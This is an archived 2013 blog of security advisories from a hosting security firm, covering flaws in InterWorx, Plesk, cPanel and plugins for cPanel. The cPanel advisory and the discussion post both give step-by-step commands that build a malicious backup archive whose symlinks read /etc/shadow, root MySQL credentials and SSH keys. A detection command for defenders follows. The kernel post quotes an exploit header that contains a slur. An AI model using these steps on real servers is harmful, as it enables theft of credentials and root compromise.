Archive for May, 2013

Interworx – Privilege Escalation (R911-0012)

Tuesday, May 28th, 2013

Type: Privilege Escalation
Impact: Critical
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #473 and v5.0.5 #513
CVE: -
R911: 0012
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. Supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

The lockmail binary (maildrop) has incorrect file permissions that makes it possible for an attacker to run malicious exploit code that would ultimately lead to a root compromise.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as CRITICAL due to the fact that a normal user can gain an instant root shell.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #473 + v5.0.5 #513.

Vendor Contact Timeline:

2013-05-05: Vendor contacted via email.
2013-05-05: Vendor confirms vulnerability.
2013-05-14: Vendor issues v4.11.6 #473 update.
2013-05-14: Vendor issues v5.0.5 #513 update.
2013-05-28: Rack911 issues security advisory.

Interworx – Content Disclosure (Root Access) #2 (R911-0011)

Tuesday, May 28th, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #473 and v5.0.5 #513
CVE: -
R911: 0011
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. Supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

The makemime binary (maildrop) has incorrect file permissions that makes it possible for an attacker to use a hardlink (ln) to sensitive files that could ultimately lead to a root compromise.

Proof of Concept:

Due to the nature of this vulnerability we are withholding the proof of concept until a later date to allow everyone ample time to update their software.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow and any private SSH keys.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #473 + v5.0.5 #513.

Vendor Contact Timeline:

2013-05-05: Vendor contacted via email.
2013-05-05: Vendor confirms vulnerability.
2013-05-20: Vendor issues v4.11.6 #473 update.
2013-05-20: Vendor issues v5.0.5 #513 update.
2013-05-28: Rack911 issues security advisory.

Interworx – Content Disclosure (Root Access) #1 (R911-0010)

Tuesday, May 28th, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #473 and v5.0.5 #512
CVE: -
R911: 0010
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. Supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

There is a flaw within the backup system that will allow an attacker to use a hardlink (ln) to any file on the server which will then be stored in a user accessible archive when the backup completes.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow and any private SSH keys.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #473 + v5.0.5 #512.

Vendor Contact Timeline:

2013-05-05: Vendor contacted via email.
2013-05-05: Vendor confirms vulnerability.
2013-05-07: Vendor issues v5.0.5 #512 update.
2013-05-14: Vendor issues v4.11.6 #473 update.
2013-05-28: Rack911 issues security advisory.

Interworx – Content Disclosure (MySQL Access) (R911-0009)

Tuesday, May 28th, 2013

Type: Content Disclosure (MySQL Access)
Impact: High
Product: InterWorx
Website: http://www.interworx.com
Vulnerable Version: v4.11.6 and v5.0.5
Fixed Version: v4.11.6 #475 and v5.0.5 #516
CVE: -
R911: 0009
Date: 2013-05-28
By: http://www.rack911.com

Product Description:

The InterWorx control panel is a Linux based dedicated server and VPS web control panel. It is feature rich for both the system administrator and website administrator. Supports software-based load balancing and clustering via a web interface.

Vulnerability Description:

There is a flaw within the import / restore feature that allows an attacker to use a malicious archive to gain access to sensitive files via a symlink attack on the bandwidth reporting graphs. The attacker would be able to access any file owned by the iworx user including the iworx.ini file that contains in plain-text the MySQL passwords for several important accounts that would ultimately allow access to all client hosted databases.

Note: In order for this vulnerability to work, the attacker must social engineer the hosting company to restore the malicious archive. However, because transferring and restoring accounts is such a common practice in the hosting world we believe this exploit to be trivial to perform.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that MySQL access can be obtained as the ‘iworx’ user which is where all of the customer databases are stored. It would be the equivalent of compromising the root MySQL credentials with other control panels.

Vulnerable Version:

This vulnerability was tested against InterWorx v4.11.6 + v5.0.5 BETA and is believed to exist in all prior versions.

Fixed Version:

This vulnerability was patched in InterWorx v4.11.6 #475 + v5.0.5 #516.

Vendor Contact Timeline:

2013-05-19: Vendor contacted via email.
2013-05-20: Vendor confirms vulnerability.
2013-05-20: Vendor issues v4.11.6 #475 update.
2013-05-20: Vendor issues v5.0.5 #516 update.
2013-05-28: Rack911 issues security advisory.

cPnginx – Content Disclosure (Root Access) (R911-0008)

Wednesday, May 22nd, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: cPnginx
Website: http://www.cpnginx.com
Vulnerable Version: 6.2 and possibly earlier earlier.
Fixed Version: 6.3
CVE: -
R911: 0008
Date: 2013-05-21
By: http://www.rack911.com

Product Description:

The cPnginx is a cPanel nginx integration plugin. This plugin will increase your server performance and decrease server loads cased by apache web server. Nginx + cPanel + Apache = Performance boosted secured hosting server.

Vulnerability Description:

cPnginx allows access to sensitive php scripts via a reseller due to the lack of ACL usage.

Through these php scripts an attacker is able to implement nginx configuration changes which will allow the attacker to view any file on the server. It is possible for the server to operate normally with these changes implemented and it is possible to disable logging of malicious http requests which means an attacker could obtain sensitive data without logging their activities.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow, the MySQL root password, any private SSH keys, and every file in the /home directory can be viewed.

Work Around:

Upgrade to the latest version of cPnginx.

Vulnerable Version:

This vulnerability was tested against cPnginx 6.2 and it is believed that prior versions are also vulnerable.

cPanel Backup Vulnerability – Discussion

Wednesday, May 22nd, 2013

I’m sure some of you are wondering why we are still going through with this release despite cPanel issuing an official statement regarding their insecure handling of archives.

Well, it’s our opinion that we shouldn’t have to resort to WHT in the first place to bring attention to a serious security flaw. Our goal has always been to help make the hosting community safer and in this case we feel that push came to shove and without releasing the proof of concept, there really is no motivation for cPanel to expedite a proper workaround. A statement is nice and all but it’s a far cry from an actual fix for what they deemed to be a “minor” flaw.

flaw

People have to understand that this isn’t our first run in with cPanel regarding security vulnerabilities going unpatched. Steven reported a serious MySQL flaw over a year ago and it remained unpatched for a long time before being silently fixed in some random build. At that time, cPanel had the same response: Do not restore from random MySQL backups or inspect each one. That was not a valid answer back then and it is not a valid answer today! The notion that providers should inspect every single archive they are restoring is ludicrous and an easy way out.

There are two direct competitors to cPanel that suffer from similar flaws and both of those companies have acted responsibly in terms of identifying the seriousness of these vulnerabilities and working on a proper fix. Unlike cPanel, they immediately accepted fault with their software and stopped what they were doing to focus on fixing it. Why is it that cPanel can’t take the same stance? Do they not care as much about their customers as other control panel companies? At what point is a serious security flaw no longer a high priority issue? These are questions we have been asking for a long time with cPanel.

Unfortunately, there are some people who agree with cPanel’s assessment that this is a minor flaw. We want to make this very clear to everyone else: This is a real functioning exploit that anyone can re-create and lead to a compromise of any cPanel server should the malicious archive be restored. Unless you feel that having the ability to read any file on the server, including the root MySQL password or obtain private SSH keys is something minor… then we urge you to continue to press cPanel for a proper workaround.

To the majority that support us, thank you. We have the security of the hosting community in mind and any release such as this is done with a lot of deep thought and discussion. There will be many more advisories coming from us in the weeks ahead, a lot of scary stuff out there but you can rest a little easier knowing that we’re doing our best to find vulnerabilities before malicious users do.

Here are the steps to create a malicious cPanel archive that when restored will allow you to view /etc/shadow, the root MySQL password in plain-text and the default root SSH private key. For demonstration purposes, we will be using attacker.com as our website and have already setup three sub domains:

rootmysql.attacker.com
rootssh.attacker.com
shadow.attacker.com

The sub domains are necessary as this attack revolves around the ability to use symlinks pointing to existing domain log files that when restored will then be converted to the actual file.

1. Log into your cPanel account and go to Backups and then Generate a Full Website Backup.

2. If you have SSH access on the same server you can log in, otherwise download the original archive to your computer and upload to another server where you do have SSH access.

3. Prepare the archive:

tar -xvf backup*.tar.gz
rm backup*.tar.gz
mv backup* cpmove-attack
cd cpmove-attack/logs

4. Prepare the malicious symlinks:

ln -s /etc/shadow shadow.attacker.com
ln -s /root/.my.cnf rootmysql.attacker.com
ln -s /root/.ssh/id_dsa rootssh.attacker.com

5. Repackage the archive:

cd ../../
tar -zcf cpmove-attack.tar.gz cpmove-attack

At this point the malicious archive has been built and you can upload it to the target server and then restore it via WHM using the Restore a Full Backup/cpmove File feature. Another option would be to restore it from the command line:

/scripts/restorepkg –force cpmove-attack.tar.gz

Once the archive has been restored on the target server, log into cPanel as the user and then go back to Backups and then Generate a Full Website Backup. After the new backup has been generated, download it to your computer and extract the contents. There will be a logs directory located under the archive name containing the target files. Simply open them with a text editor and there you go.

I have also attached a pre-built malicious archive that will do exactly as the written instructions above will do. Simply restore it via WHM and then log into cPanel to generate a new full backup and then download to view the target files. The username for cPanel is attack and the password is cpanelfail :)

To hosting providers who would like to help mitigate the risks of the above vulnerability, what we suggest for the time being is to run the following command against all archives that you are about to restore to check for the presence of a possible symlink attack:

tar -ztvf cpmove-attack.tar.gz | grep ‘ -> ‘ |egrep -v “(homedir/public_html|homedir/www)”

If the archive is fine you will not see anything. However, if there is a possible symlink attack present than the output will look like this:

root@server [~]# tar -ztvf cpmove-attack.tar.gz | grep ‘ -> ‘ |grep -v public_html
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootmysql.attacker.com -> /root/.my.cnf
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/shadow.attacker.com -> /etc/shadow
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootssh.attacker.com -> /root/.ssh/id_dsa
root@server [~]#

Should you see results like that, you are urged to not restore the backup under any circumstances and presume that the user is attempting to compromise your security. For now, this is our best advice but we are working on a better (automated) solution that can be worked into the existing cPanel restore feature. Stay tuned for details, we hope to have something out this week.

 

cPanel – Backup Restoration Content Disclosure (R911-0007)

Wednesday, May 22nd, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: 11.38.0.8 and earlier.
Fixed Version: -
CVE: -
R911: 0007
Date: 2013-05-22
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

There is a flaw within the import / restore feature that allows an attacker to use a malicious archive to gain access to sensitive files via a symlink attack due to an incorrect handling of the domain log files. When the malicious archive is restored the symlinks become normal files that can then be backed up and viewed by the user.

Note: In order for this vulnerability to work, the attacker must social engineer the hosting company to restore the malicious archive. However, because transferring and restoring accounts is such a common practice in the hosting world we believe this exploit to be trivial to perform.

Proof of Concept:

Here are the steps to create a malicious cPanel archive that when restored will allow you to view /etc/shadow, the root MySQL password in plain-text and the default root SSH private key. For demonstration purposes, we will be using attacker.com as our website and have already setup three sub domains:

rootmysql.attacker.com
rootssh.attacker.com
shadow.attacker.com

The sub domains are necessary as this attack revolves around the ability to use symlinks pointing to existing domain log files that when restored will then be converted to the actual file.

1. Log into your cPanel account and go to Backups and then Generate a Full Website Backup.

2. If you have SSH access on the same server you can log in, otherwise download the original archive to your computer and upload to another server where you do have SSH access.

3. Prepare the archive:

tar -xvf backup*.tar.gz
rm backup*.tar.gz
mv backup* cpmove-attack
cd cpmove-attack/logs

4. Prepare the malicious symlinks:

ln -s /etc/shadow shadow.attacker.com
ln -s /root/.my.cnf rootmysql.attacker.com
ln -s /root/.ssh/id_dsa rootssh.attacker.com

5. Repackage the archive:

cd ../../
tar -zcf cpmove-attack.tar.gz cpmove-attack

At this point the malicious archive has been built and you can upload it to the target server and then restore it via WHM using the Restore a Full Backup/cpmove File feature. Another option would be to restore it from the command line:

/scripts/restorepkg –force cpmove-attack.tar.gz

Once the archive has been restored on the target server, log into cPanel as the user and then go back to Backups and then Generate a Full Website Backup. After the new backup has been generated, download it to your computer and extract the contents. There will be a logs directory located under the archive name containing the target files. Simply open them with a text editor and there you go.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow, the MySQL root password and any private SSH keys. (It is also possible to grab multiple files at once using several symlink attacks within one malicious archive.)

It’s important to note that cPanel has deemed this vulnerability to be “minor” in their eyes which we view to be extremely reckless towards the security of every hosting provider out there. It is their opinion that web hosting providers should not transfer or restore accounts from untrusted sources. As we all know, this practice is extremely common with shared hosting and especially reseller hosting providers.

We cannot stress enough how inexcusable it is for cPanel to view this flaw as a minor vulnerability. An attacker could create their own malicious archive in minutes and come up with 100 different plausible excuses to have their hosting provider restore the archive without so much of a second thought. We’re trying to make the hosting community safer, but we cannot do it when companies such as cPanel continue to act like this.

Work Around:

To hosting providers who would like to help mitigate the risks of the above vulnerability, what we suggest for the time being is to run the following command against all archives that you are about to restore to check for the presence of a possible symlink attack:

tar -ztvf archive.tar.gz | grep ‘ -> ‘ |grep -v public_html

If the archive is fine you will not see anything. However, if there is a possible symlink attack present than the output will look like this:

root@server [~]# tar -ztvf cpmove-attack.tar.gz | grep ‘ -> ‘ |grep -v public_html
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootmysql.attacker.com -> /root/.my.cnf
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/shadow.attacker.com -> /etc/shadow
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootssh.attacker.com -> /root/.ssh/id_dsa
root@server [~]#

Should you see results like that, you are urged to not restore the backup under any circumstances and presume that the user is attempting to compromise your security. For now, this is our best advice but we are working on a better (automated) solution that can be worked into the existing cPanel restore feature. Stay tuned for details, we hope to have something out this week.

Vulnerable Version:

This vulnerability was tested against cPanel (WHM) v11.38.0.8 and is believed to exist in all previous versions.

cPremote – Elevated Privileges (R911-0006)

Wednesday, May 22nd, 2013

Type: Elevated Privileges
Impact: Medium
Product: cPremote
Website: http://www.cpnginx.com
Vulnerable Version: 6.9 and possibly earlier earlier.
Fixed Version: 6.10
CVE: -
R911: 0006
Date: 2013-05-21
By: http://www.rack911.com

Product Description:

cPremote is a remote rsync backup plugin for the famous hosting control panel cPanel. It is a WHM plugin. This will take all your cPanel accounts backups into a remote server over ssh via incremental backup method. So you can have all your servers and cPanel accounts backups into a central backup server.

Vulnerability Description:

cPremote allows access to root only functions in the software to resellers. Through this vulnerability it is possible for an attacker to disable / modify server wide backup settings and restore any users backups (potentially overwriting customer data).

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as MEDIUM due to the fact that backups can be disabled and customer data can be overwritten by a reseller.

Work Around:

Upgrade to the latest version of cPremote.

Vulnerable Version:

This vulnerability was tested against cPremote 6.9 and it is believed that prior versions are also vulnerable.

Plesk – Content Disclosure (Root Access) (R911-0005)

Monday, May 20th, 2013

Type: Content Disclosure (Root Access)
Impact: High
Product: Plesk
Website: http://www.plesk.com
Vulnerable Version: v11.0.9 #49 and prior.
Fixed Version: v11.0.9 #50 and later.
CVE: -
R911: 0005
Date: 2013-05-20
By: http://www.rack911.com

Product Description:

Parallels “Plesk”  allows a server administrator to set up new websites, reseller accounts, e-mail accounts, and DNS entries through a web-based interface. The administrator can create client and site templates, which predetermine resource-allocation parameters for the domains and/or clients.

Vulnerability Description:

There is a flaw within the website copying feature that allows an attacker to use a hardlink (ln) to any file on the server which will then be copied to the destination. This attack can be done by all users and SSH access is not required for it to work.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow and any private SSH keys.

Vulnerable Version:

This vulnerability was tested against Plesk v11.0.9 #49.

Fixed Version:

This vulnerability was patched in Plesk v11.0.9 #50 and later.

Vendor Contact Timeline:

2013-05-09: Vendor contacted via email.
2013-05-13: Vendor confirms vulnerability.
2013-05-14: Vendor issues v11.0.9 #50 update.
2013-05-20: Rack911 issues security advisory.

Kernel Exploit: CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access

Tuesday, May 14th, 2013

There is a new kernel exploit affecting a variety of linux distributions. This is a privilege escalation exploit.

“The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.”

You can read about it here:

http://www.webhostingtalk.com/showthread.php?t=1266042

https://access.redhat.com/security/cve/CVE-2013-2094

https://bugzilla.redhat.com/show_bug.cgi?id=962792

https://news.ycombinator.com/item?id=5703758

http://www.reddit.com/r/netsec/comments/1eb9iw/sdfucksheeporgs_semtexc_local_linux_root_exploit/c9ykrck

From the exploit:

/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

There is a temporary work around:

https://bugzilla.redhat.com/show_bug.cgi?id=962792#c13

There are some temporary rpms located here:

http://people.centos.org/hughesjr/c6kernel/2.6.32-358.6.1.el6.cve20132094/x86_64/

Server management customers of Rack911 are being proactively monitored and patched for this vulnerability.